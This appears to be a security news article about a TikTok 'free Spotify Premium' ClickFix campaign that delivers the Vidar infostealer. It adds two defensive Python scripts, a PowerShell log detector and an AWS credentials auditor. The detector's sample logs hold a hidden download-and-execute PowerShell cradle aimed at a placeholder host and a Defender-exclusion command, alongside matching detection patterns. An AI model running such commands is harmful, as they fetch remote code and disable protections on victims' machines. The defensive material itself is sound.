TikTok ‘Free Spotify’ Scam Uses ClickFix to Deploy Vidar Malware on DevOps
A recent campaign on TikTok and Instagram Reels uses AI‑generated “free Spotify Premium” tutorials to lure developers and operations engineers into running a malicious PowerShell command that silently installs the Vidar infostealer, harvesting browser data, crypto wallets, and critical cloud credentials.
You might think you’re just watching a "free Spotify Premium" tutorial on TikTok, but your computer could already be infected with the Vidar espionage trojan, targeting developers and ops staff who log into corporate AWS consoles or GitHub Enterprise from personal devices.
1. Attackers Target Your Social Media Feed
ReversingLabs researchers uncovered two active, highly targeted phishing campaigns that have abandoned traditional email phishing. Instead, they post AI‑generated “crack tutorial” videos on TikTok and Instagram Reels, promising free Spotify Premium, permanent Windows activation, or free Microsoft Office.
By tagging videos with popular Windows and Office keywords, the platforms’ algorithms push them to users searching for “how to get free software,” a group that includes many developers and sysadmins who manage production environments on personal machines.
The attack chain has three stages: the lure video, execution of the pasted PowerShell command, and the Vidar infostealer payload. All three steps are fully automated.
2. ClickFix Technique: Victims Trigger the Attack Themselves
The core method, dubbed “ClickFix” in the security community, does not rely on vulnerabilities or malicious email attachments. Instead, attackers craft a web page that convinces victims to run malicious commands themselves.
Attack flow:
Step 1: AI‑generated lure video – Actors mass‑produce seemingly professional “tech tutorial” videos under accounts like “windows.tips” or “windows.insights,” using Windows‑style visuals. The video walks viewers through “three steps to get free Spotify Premium.”
Step 2: Prompt to open PowerShell – The tutorial tells users to open the built‑in Windows PowerShell tool and paste an “activation command,” which is actually the trigger.
Step 3: Silent malicious command execution – The PowerShell snippet downloads and runs Vidar from the attacker’s server, leaving no files on disk and showing no pop‑up warnings.
ReversingLabs reports that the malicious scripts also add exclusions to Windows Defender, whitelisting the malicious directory and making subsequent activity harder to detect.
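One way for a defender to surface the two behaviours this section describes (an in-memory download-and-run cradle, and a Defender exclusion being added) is to score PowerShell script-block logs. The following is an added example written for this page, not code from ReversingLabs or from any vendor product; the log format is a simplified, assumed rendering of Event ID 4104 records, the three sample lines are constructed, and the rule weights and alert threshold are illustrative choices.

```python
import re
from dataclasses import dataclass

# Constructed sample log lines (not from the page), loosely modelled on
# PowerShell script-block logging (Event ID 4104). Line 2 is benign admin
# activity; lines 1 and 3 show the traits the article describes: a fileless
# download-and-execute cradle run hidden, and a Defender exclusion being added.
SAMPLE_LOGS = [
    r'4104 host=dev-laptop user=alice script=powershell -w hidden -ep bypass -c "iex (iwr http://example.invalid/act.ps1 -UseBasicParsing)"',
    r'4104 host=dev-laptop user=alice script=Get-ChildItem C:\repo | Measure-Object',
    r'4104 host=build-01 user=bob script=Add-MpPreference -ExclusionPath C:\Users\bob\AppData\Local\Temp',
]

# Assumed line layout: "<event> host=<h> user=<u> script=<rest of line>"
LOG_RE = re.compile(r"^(?P<event>\d+) host=(?P<host>\S+) user=(?P<user>\S+) script=(?P<script>.*)$")

# (rule name, pattern, weight). Weights are illustrative, not a vendor scale.
RULES = [
    ("download_cradle",
     re.compile(r"\b(iwr|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|net\.webclient)\b", re.I), 2),
    ("in_memory_exec", re.compile(r"\b(iex|invoke-expression)\b", re.I), 2),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I), 1),
    ("policy_bypass", re.compile(r"-e(xecution)?p(olicy)?\s+bypass", re.I), 1),
    ("encoded_command", re.compile(r"-e(nc|ncodedcommand)\b", re.I), 2),
    # Add-MpPreference with an -Exclusion* parameter is the Defender whitelisting
    # step the article reports; a single hit is enough to alert on its own.
    ("defender_exclusion", re.compile(r"add-mppreference\s+.*-exclusion(path|process|extension)", re.I), 3),
]
ALERT_THRESHOLD = 3


@dataclass
class Finding:
    host: str
    user: str
    score: int
    rules: list
    script: str


def score_script(script: str):
    """Return (total weight, names of rules that matched) for one script block."""
    hits = [name for name, pat, _ in RULES if pat.search(script)]
    score = sum(w for name, _, w in RULES if name in hits)
    return score, hits


def scan(lines):
    """Parse script-block log lines and return those scoring at or above the threshold."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("event") != "4104":
            continue
        score, hits = score_script(m.group("script"))
        if score >= ALERT_THRESHOLD:
            findings.append(Finding(m.group("host"), m.group("user"), score, hits, m.group("script")))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"[ALERT] {f.host}/{f.user} score={f.score} rules={','.join(f.rules)}")
        print(f"        {f.script}")
```

Script-block logging has to be enabled on the endpoints for any of this to fire; the exclusion rule is the higher-confidence signal, since legitimate admin use of `Add-MpPreference` on a developer laptop is rare and can be allow-listed by host or user.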
3. Vidar Trojan: A Credential‑Harvesting Machine for DevOps
The payload is Vidar, a modular infostealer that targets the following data:
Browser‑saved passwords (Chrome, Firefox, Edge)
Browser autofill data
Browser cookies, especially logged‑in sessions
Cryptocurrency wallets (Exodus, MetaMask, etc.)
Two‑factor authentication (2FA) data
TOR browser data
Beyond these, the trojan seeks high‑value cloud credentials:
AWS console credentials (IAM users, access keys)
GitHub Enterprise sessions (repository access tokens)
Enterprise VPN login state
Internal network authentication tokens
Compromising these gives attackers full access to a company’s cloud infrastructure. The authors stress that social engineering—not zero‑day exploits—is the primary weapon, requiring only that the victim run a PowerShell command.
4. Scope and Real‑World Threat
The danger lies in scale rather than technical sophistication. Similar TikTok‑based poisoning campaigns have been reported by multiple national cybersecurity agencies. Research shows the malicious PowerShell scripts have spread globally, affecting ordinary users, developers, and enterprise ops staff.
High‑risk groups include:
Developers who build and maintain cloud infrastructure on personal Macs/PCs
DevOps engineers who log into AWS, Azure, or GCP consoles from personal devices
Anyone who stores corporate intranet credentials in a browser
Remote workers handling work tasks on personal hardware
5. Security Recommendations
While no single fix eliminates the risk, the following measures can reduce the likelihood of infection:
Never download software from unofficial sources (e.g., “free” Spotify Premium, Windows activation keys, cracked video editors).
Avoid executing PowerShell commands on any webpage, especially those with countdown timers or fake user‑count pressure.
Verify digital signatures before running executables: right‑click → Properties → Digital Signatures.
Enterprises should strengthen endpoint detection and require hardware‑based authentication (WebAuthn/FIDO2) instead of password‑only logins for cloud resources.
Deploy real‑time anti‑malware solutions capable of blocking Vidar before it executes.
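Since the article singles out AWS access keys stored on personal machines as a prime target, a complementary check on the developer side is to find which local AWS profiles still hold long-term IAM user keys (which an infostealer can reuse until rotated) rather than temporary STS credentials (which expire on their own). The following is an added example for this page, not part of the article or any AWS tooling; the credentials file content is constructed, and the only AWS-specific fact it relies on is the documented key-ID prefix convention (`AKIA` for long-term keys, `ASIA` for temporary ones).

```python
import configparser

# Constructed sample of a ~/.aws/credentials file (not from the page).
# Key IDs and secrets are placeholders, not real credentials.
SAMPLE_CREDENTIALS = """\
[default]
aws_access_key_id = AKIAEXAMPLELONGTERM1
aws_secret_access_key = EXAMPLE-secret-placeholder

[prod-admin]
aws_access_key_id = AKIAEXAMPLELONGTERM2
aws_secret_access_key = EXAMPLE-secret-placeholder

[sso-cache]
aws_access_key_id = ASIAEXAMPLETEMPORARY
aws_secret_access_key = EXAMPLE-secret-placeholder
aws_session_token = EXAMPLE-session-token-placeholder
"""


def classify_profiles(text: str) -> dict:
    """Map each profile name to 'long-term', 'temporary' or 'unknown'.

    AKIA-prefixed IDs are long-term IAM user keys; ASIA-prefixed IDs paired
    with a session token are temporary credentials issued by STS.
    """
    cp = configparser.ConfigParser()
    cp.read_string(text)
    report = {}
    for section in cp.sections():
        key = cp[section].get("aws_access_key_id", "")
        has_token = "aws_session_token" in cp[section]
        if key.startswith("AKIA"):
            report[section] = "long-term"
        elif key.startswith("ASIA") and has_token:
            report[section] = "temporary"
        else:
            report[section] = "unknown"
    return report


def long_term_profiles(text: str) -> list:
    """Profiles whose stolen contents would stay valid until someone rotates the key."""
    return sorted(name for name, kind in classify_profiles(text).items() if kind == "long-term")


def audit(text: str) -> str:
    """Human-readable summary for a developer or a laptop-compliance script."""
    stale = long_term_profiles(text)
    if not stale:
        return "OK: no long-term access keys found on disk"
    return "ROTATE: long-term keys in profiles " + ", ".join(stale)


if __name__ == "__main__":
    # Point this at the real file with: open(os.path.expanduser("~/.aws/credentials")).read()
    print(audit(SAMPLE_CREDENTIALS))
```

Profiles reported as long-term are the ones worth moving to short-lived credentials (for example via an identity-provider-backed sign-in with hardware MFA, as the article recommends), so that a stealer that copies the file gets only tokens that are already close to expiry.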
6. Conclusion
The “free Spotify Premium” TikTok videos may be the entry point that compromises your company’s cloud infrastructure. Attackers are mass‑producing AI‑driven phishing content, using the ClickFix method to bypass security controls, and deploying Vidar to harvest valuable enterprise credentials. This is a targeted, low‑effort, high‑reward campaign aimed at the developer community.
You think you’re getting free Spotify; in reality, you’re the one being harvested.